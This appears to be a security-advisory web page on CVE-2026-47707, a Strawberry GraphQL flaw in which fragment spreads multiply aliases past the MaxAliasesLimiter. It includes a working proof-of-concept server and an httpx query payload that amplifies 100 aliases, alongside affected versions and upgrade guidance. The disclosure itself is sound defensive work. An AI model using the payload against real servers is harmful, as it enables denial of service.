CVE-2026-47707: Strawberry GraphQL's Bypass of MaxAliasesLimiter via Fragment Spreads leading to GraphQL Alias Amplification

Published Jun 4, 2026
·
Updated

Summary The MaxAliasesLimiter extension in Strawberry fails to account for the multiplicative/amplification effect of FragmentSpreadNode. While it correctly counts static aliases within the AST it does not consider how many times a fragments internal aliases are expanded during execution. this allows an attacker to bypass alias limits and force the server to resolve and render a significantly higher number of aliases than allowed, potentially leading to a dos via resource exhaustion.

Details The current implementation of alias counting in strawberry/extensions/maxaliases.py uses a static approach for selection in selectionsetowner.selectionset.selections: if isinstance(selection, FieldNode) and selection.alias: result += 1

if isinstance(selection, (FieldNode, InlineFragmentNode)) and ~~~: result += countfieldswithalias(selection)

When a FragmentSpread is used multiple times, the actual number of aliases processed by the execution engine is

Total Aliases = query aliases + (num of spreads aliases within fragment)

Because Strawberry only performs a static sum of the text, it misses this multiplication

PoC server code import strawberry from fastapi import FastAPI from strawberry.fastapi import GraphQLRouter from strawberry.extensions import MaxAliasesLimiter

@strawberry.type class User: name: str = "GONA"

@strawberry.type class Query: @strawberry.field def user(self) -> User: return User()

Limit is set to 20 aliases schema = strawberry.Schema( query=Query, extensions=[MaxAliasesLimiter(maxaliascount=20)] )

app = FastAPI() app.includerouter(GraphQLRouter(schema), prefix="/graphql")

payloads import httpx

payload = { "query": """ fragment Amplification on User { a1: name, a2: name, a3: name, a4: name, a5: name, a6: name, a7: name, a8: name, a9: name, a10: name } query Bypass { u1: user { ...Amplification } u2: user { ...Amplification } u3: user { ...Amplification } u4: user { ...Amplification } u5: user { ...Amplification } u6: user { ...Amplification } u7: user { ...Amplification } u8: user { ...Amplification } u9: user { ...Amplification } u10: user { ...Amplification } } """ }

response = httpx.post("http://127.0.0.1:8000/graphql", json=payload) print(f"Status: {response.statuscode}") The response will contain 100 'a' aliases nested within 10 'u' aliases. print(response.json())

Impact An attacker can bypass security constraints to cause Application-level DOS. By staying just under the maxaliascount limit in the AST an attacker can trigger thousands of actual alias resolutions on the backend consuming excessive CPU and memory

Other sources

Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.172.0 through0.315.6, the MaxAliasesLimiter extension in Strawberry fails to account for the multiplicative/amplification effect of FragmentSpreadNode. While it correctly counts static aliases within the AST it does not consider how many times a fragments internal aliases are expanded during execution. this allows an attacker to bypass alias limits and force the server to resolve and render a significantly higher number of aliases than allowed, potentially leading to a dos via resource exhaustion. Version 0.315.7 contains a fix for the issue.

— MITRE

Affected Software

3 affected componentsFixes available
pypi/strawberry-graphql>=0.172.0<=0.315.6
pip/strawberry-graphql>=0.172.0<=0.315.6
0.315.7
Strawberry Strawberry Graphql Python>=0.172.0<0.315.7

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/strawberry-graphql to a version that resolves this vulnerability.

    Fixed in 0.315.7
  2. Upgrade

    Upgrade Strawberry GraphQL (strawberry/extensions/max_aliases.py) to a version that resolves this vulnerability.

    Fixed in 0.315.7
  3. Compensating control

    If you cannot upgrade immediately, restrict or rate-limit GraphQL requests to reduce the impact of alias amplification via Fragment Spreads that can bypass MaxAliasesLimiter in versions 0.172.0 through0.315.6.

Event History

Jun 4, 2026
CVE Published
via MITRE·02:12 PM
Data Sourced
via MITRE·02:12 PM
DescriptionSeverityWeakness
Advisory Published
via GitHub·02:39 PM
Data Sourced
via GitHub·02:39 PM
DescriptionSeverityWeaknessAffected Software
Data Sourced
via NVD·03:16 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-47707?

The severity of CVE-2026-47707 is classified as medium with a score of 5.3.

2

How does CVE-2026-47707 affect Strawberry GraphQL?

CVE-2026-47707 allows for alias amplification due to the MaxAliasesLimiter's failure to consider the expansion effects of fragmented aliases.

3

How can I fix CVE-2026-47707 in my application?

To fix CVE-2026-47707, update to the latest version of Strawberry GraphQL that addresses this vulnerability.

4

What is the risk associated with CVE-2026-47707?

The risk associated with CVE-2026-47707 is rated as 27, indicating a moderate concern for potential exploitation.

5

What is the MaxAliasesLimiter in relation to CVE-2026-47707?

The MaxAliasesLimiter is an extension in Strawberry that improperly counts aliases, leading to vulnerabilities when using fragment spreads.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203